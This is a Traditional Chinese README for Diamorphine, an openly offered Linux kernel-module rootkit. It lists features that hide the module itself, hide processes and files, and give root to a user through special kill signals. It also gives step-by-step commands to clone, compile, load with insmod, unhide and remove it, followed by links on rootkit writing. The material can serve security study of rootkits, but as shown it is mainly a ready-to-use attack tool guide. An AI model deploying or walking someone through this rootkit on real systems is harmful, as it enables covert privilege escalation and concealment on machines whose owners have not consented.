Diamorphine

Diamorphine 是適用於 Linux 核心 2.6.x/3.x/4.x/5.x/6.x（x86/x86_64 和 ARM64）的 LKM rootkit

• 載入後，模組開始不可見；

• 透過發送訊號31來隱藏/取消隱藏任何進程；

• 發送訊號 63（到任何 pid）使模組變得可見（不可見）；

• 發送訊號 64（到任何 pid）使給定使用者成為 root；

• 以 MAGIC_PREFIX 開頭的檔案或目錄變得不可見；

• 資料來源：https://github.com/m0nad/Diamorphine

驗證核心是否為 2.6.x/3.x/4.x/5.x

 uname -r

克隆儲存庫

 git clone https://github.com/m0nad/Diamorphine

輸入資料夾

 cd Diamorphine

編譯

 make

載入模組（以 root 身分）

 insmod diamorphine.ko

該模組開始時不可見，要刪除您需要使其可見

 kill -63 0

然後刪除模組（以root身分）

 rmmod diamorphine

維基百科 Rootkit https://en.wikipedia.org/wiki/Rootkit

Linux 裝置驅動程式 http://lwn.net/Kernel/LDD3/

LKM 駭客 https://web.archive.org/web/20140701183221/https://www.thc.org/papers/LKM_HACKING.html

Memset 的部落格 http://memset.wordpress.com/

無需 LKM 的 Linux 動態核心修補 http://phrack.org/issues/58/7.html

為 LINUX 寫一個簡單的 Rootkit https://web.archive.org/web/20160620231623/http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt

Linux 交叉參考 http://lxr.free-electrons.com/

zizzu0 LinuxKernelModules https://github.com/zizzu0/LinuxKernelModules/

Linux Rootkit：核心 5.7+ 的新方法 https://xcellerator.github.io/posts/linux_rootkits_11/